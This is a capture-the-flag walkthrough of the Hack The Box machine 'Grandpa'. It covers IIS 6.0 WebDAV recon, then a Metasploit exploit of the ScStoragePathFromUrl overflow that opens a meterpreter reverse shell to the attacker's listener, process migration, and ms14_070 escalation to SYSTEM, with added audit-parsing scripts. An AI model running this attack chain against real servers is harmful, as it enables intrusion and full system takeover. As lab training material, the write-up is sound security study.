Grandpa

Introduction:
"Grandpa" is an easy Windows machine that is exploited with a Metasploit module for a known CVE. Because the box is very old, it is also vulnerable to many other exploits, so there are several options to choose from for the privilege escalation at the end. The key takeaways for me were:
- Based on the CVE you are exploiting, determine whether you need to migrate your process on the target box to another one before running a local exploit.
- Know the popular exploits thoroughly. Picking the correct exploit is important, but also assess whether you could crash the machine in the process.
Recon
NMAP scan
nmap -sS -sV -T4 -sC -O -oN nmap.grandpa.txt 10.10.10.14
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-30 16:47 EST
Nmap scan report for 10.10.10.14
Host is up (0.015s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Wed, 30 Dec 2020 21:56:17 GMT
|   Server Type: Microsoft-IIS/6.0
|_  WebDAV type: Unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (90%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows 2000 SP4 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.86 seconds
Notes:
- Port 80 is open and runs IIS 6.0, which advertises potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
- WebDAV is enabled, which is a potential entry point
- The port scanner did not report any other open ports
- Next steps could be:
  - Nikto scan
  - Advanced nmap scripts
  - WebDAV and web server enumeration
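The method lists above are the first thing to check when auditing an IIS host for WebDAV exposure. The following is an added example (not part of the original writeup) that parses the nmap http-methods and http-webdav-scan lines shown above and classifies what the server advertises: write-capable WebDAV verbs versus disclosure-only ones, plus the methods that appear in the Public header but not in the per-resource Allow header. The sample input is a constructed excerpt of this page's scan output.

```python
import re

# Verbs that let a client create, change or remove content once WebDAV is on.
# These are the ones Nikto later flags (PUT/DELETE/MOVE) plus the other
# write-capable verbs nmap listed as "potentially risky".
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
# Verbs that mainly leak information (internal paths, resource properties).
DISCLOSURE_METHODS = {"TRACE", "PROPFIND", "SEARCH"}
WEBDAV_VERBS = {"PROPFIND", "PROPPATCH", "MKCOL", "LOCK", "UNLOCK", "COPY", "MOVE"}

# Constructed excerpt of the nmap -sC output from this writeup.
NMAP_SAMPLE = """\
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-webdav-scan:
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
"""

PATTERNS = {
    "risky": r"Potentially risky methods:\s*(.+)",
    "allowed": r"Allowed Methods:\s*(.+)",   # per-resource Allow header
    "public": r"Public Options:\s*(.+)",     # server-wide Public header
}


def parse_nmap_methods(text):
    """Extract the three method lists from nmap output into sets of upper-case verbs."""
    found = {key: set() for key in PATTERNS}
    for key, pat in PATTERNS.items():
        m = re.search(pat, text)
        if m:
            # nmap separates the lists with either commas or plain spaces
            found[key] = {t.upper() for t in re.split(r"[,\s]+", m.group(1)) if t}
    return found


def assess(methods):
    """Classify exposed verbs so the risky ones stand out in an audit report."""
    exposed = methods["public"] | methods["allowed"]
    return {
        "write": sorted(exposed & WRITE_METHODS),
        "disclosure": sorted(exposed & DISCLOSURE_METHODS),
        "webdav_enabled": bool(exposed & WEBDAV_VERBS),
        # advertised server-wide but not on the scanned resource: still worth
        # checking other paths, since the capability exists on the server
        "public_only": sorted(methods["public"] - methods["allowed"]),
    }


if __name__ == "__main__":
    print(assess(parse_nmap_methods(NMAP_SAMPLE)))
```

On a hardened IIS host the expected result is an empty "write" list and webdav_enabled False; anything else means WebDAV (or the write verbs) should be disabled for the site.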
Web recon
Visit the website using the browser -

Enumeration
Nikto scan
nikto -url http://grandpa.htb
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    grandpa.htb
+ Target Port:        80
+ Start Time:         2020-12-30 16:55:28 (GMT-5)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (UNLOCK SEARCH MKCOL COPY PROPPATCH LOCK PROPFIND listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://10.10.10.14/
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ 7937 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time:           2020-12-30 16:58:51 (GMT-5) (203 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The _vti_rpc path discovered by the dirbuster and Nikto scans reveals that the server uses Microsoft FrontPage, which could be another way in; however, my initial tinkering with it did not lead to anything.

Search for the possible vulnerabilities
# searchsploit webdav | grep -i iis | grep remote
Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow                                    | windows/remote/1.c
Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit)            | windows/remote/41992.rb
Microsoft IIS - WebDAV Write Access Code Execution (Metasploit)                       | windows/remote/16471.rb
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overf   | windows/remote/22365.pl
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overf   | windows/remote/22366.c
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overf   | windows/remote/22367.txt
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overf   | windows/remote/22368.txt
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)          | windows/remote/16470.rb
Microsoft IIS 5.0 - WebDAV Remote                                                     | windows/remote/2.c
Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)                          | windows/remote/51.c
Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure                        | windows/remote/26230.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow              | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                           | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                           | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                       | windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)                         | windows/remote/8765.php

Exploitation
The WebDAV 'ScStoragePathFromUrl' buffer overflow matches the IIS 6.0 version found in recon, and it looks fairly simple and safe to execute.
searchsploit -m windows/remote/41738.py
  Exploit: Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow
      URL: https://www.exploit-db.com/exploits/41738
     Path: /usr/share/exploitdb/exploits/windows/remote/41738.py
File Type: ASCII text, with very long lines, with CRLF line terminators
Metasploit
msf6 > use windows/iis/iis_webdav_scstoragepathfromurl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.8         yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86


msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost tun0
lhost => tun0
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
rhosts => 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set target 0
target => 0
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.25:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.25:4444 -> 10.10.10.14:1030) at 2020-12-31 13:23:13 -0500
Interact with the meterpreter session and run the local exploit suggester. Note that getuid already fails with "Access is denied", a first hint that the process we landed in has a restricted token:
meterpreter > getuserid
[-] Unknown command: getuserid.
meterpreter > getuid
[-] 1055: Operation failed: Access is denied.
meterpreter > sysinfo
Computer        : GRANPA
OS              : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use 0
msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information  Connection
  --  ----  ----                     -----------  ----------
  1         meterpreter x86/windows               10.10.14.25:4444 -> 10.10.10.14:1030 (10.10.10.14)

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 35 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
Post-exploit/PrivEsc
ms14_070_tcpip_ioctl can be used to elevate access. As the output below shows, the first run fails with "Access is denied" because the session lives in a rundll32.exe process spawned by w3wp.exe; after migrating into davcdata.exe, which runs as NT AUTHORITY\NETWORK SERVICE, the same exploit succeeds:
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show optins
[-] Invalid parameter "optins", use "show -h" for more information
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show options

Module options (exploit/windows/local/ms14_070_tcpip_ioctl):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.8         yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Server 2003 SP2


msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set target 0
target => 0
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lport 4455
lport => 4455
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information  Connection
  --  ----  ----                     -----------  ----------
  1         meterpreter x86/windows               10.10.14.25:4444 -> 10.10.10.14:1030 (10.10.10.14)

msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.25:4455
[-] Exploit failed: Rex::Post::Meterpreter::RequestError 1054: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > ps
[*] exec: ps

    PID TTY          TIME CMD
   3321 pts/1    00:00:00 sudo
   3322 pts/1    00:00:00 su
   3323 pts/1    00:00:00 bash
   3348 pts/1    00:00:30 ruby
   3622 pts/1    00:00:00 ps
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions 1
[*] Starting interaction with 1...

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 324   272   csrss.exe
 348   272   winlogon.exe
 396   348   services.exe
 408   348   lsass.exe
 588   396   svchost.exe
 664   1084  cidaemon.exe
 680   396   svchost.exe
 736   396   svchost.exe
 764   396   svchost.exe
 800   396   svchost.exe
 932   1084  cidaemon.exe
 936   396   spoolsv.exe
 964   396   msdtc.exe
 1080  1084  cidaemon.exe
 1084  396   cisvc.exe
 1124  396   svchost.exe
 1180  396   inetinfo.exe
 1220  396   svchost.exe
 1316  396   VGAuthService.exe
 1408  396   vmtoolsd.exe
 1456  396   svchost.exe
 1600  396   svchost.exe
 1708  396   alg.exe
 1804  588   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1912  396   dllhost.exe
 2304  588   wmiprvse.exe
 2464  348   logon.scr
 2504  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2572  588   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 2620  2504  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe

meterpreter > migrate 2572
[*] Migrating from 2620 to 2572...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.25:4455
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.14.25 -> 10.10.10.14
[*] Meterpreter session 2 opened (10.10.14.25:4455 -> 10.10.10.14:1033) at 2020-12-31 13:34:40 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Notes:
- Remember to migrate to another process running as NETWORK SERVICE (such as svchost) so that you can broaden the scope of your privilege escalation.
- This process migration will come in handy over and over as you do more machines, and I would consider it a "common gotcha"!
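The process list above is the evidence behind this note: the session sat in rundll32.exe (PID 2620), a child of the w3wp.exe worker, and the table shows no owner for it, which is why getuid and the local exploit both returned "Access is denied". The following is an added example (not part of the original writeup) that parses a meterpreter ps table and explains that situation: it reports the current process and its parent, whether its owner is readable, and which same-architecture processes have a visible owner. The table is a constructed excerpt of the one on this page.

```python
import re

# Constructed excerpt of the meterpreter "ps" output shown in this writeup.
PS_SAMPLE = r"""
 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 588   396   svchost.exe
 1456  396   svchost.exe
 1804  588   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2504  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2572  588   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 2620  2504  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
"""

# One table row. Arch/Session/User/Path are only present for processes whose
# token the session can query; User may itself be blank (the rundll32 row),
# and both Name and User can contain spaces, so the path is anchored on "X:\".
ROW = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\S+(?: \S+)*?)"
    r"(?:\s+(?P<arch>x86|x64)\s+(?P<session>\d+)"
    r"(?:\s+(?P<user>\S.*?))?\s+(?P<path>[A-Za-z]:\\\S+))?\s*$"
)


def parse_ps(text):
    """Turn the ps table into a list of dicts; header and separator rows are skipped."""
    procs = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        row = m.groupdict()
        for key in ("pid", "ppid", "session"):
            if row[key] is not None:
                row[key] = int(row[key])
        procs.append(row)
    return procs


def explain_session(procs, current_pid):
    """Summarise what the session can see about itself and the other processes."""
    by_pid = {p["pid"]: p for p in procs}
    cur = by_pid[current_pid]
    parent = by_pid.get(cur["ppid"])
    visible = [p for p in procs if p["user"]]  # owner readable from this session
    return {
        "current": cur["name"],
        "parent": parent["name"] if parent else None,
        "current_owner_known": cur["user"] is not None,
        "owner_visible": sorted(p["name"] for p in visible),
        "same_arch_with_owner": sorted(
            p["pid"] for p in visible if p["arch"] == cur["arch"] and p["pid"] != current_pid
        ),
    }
```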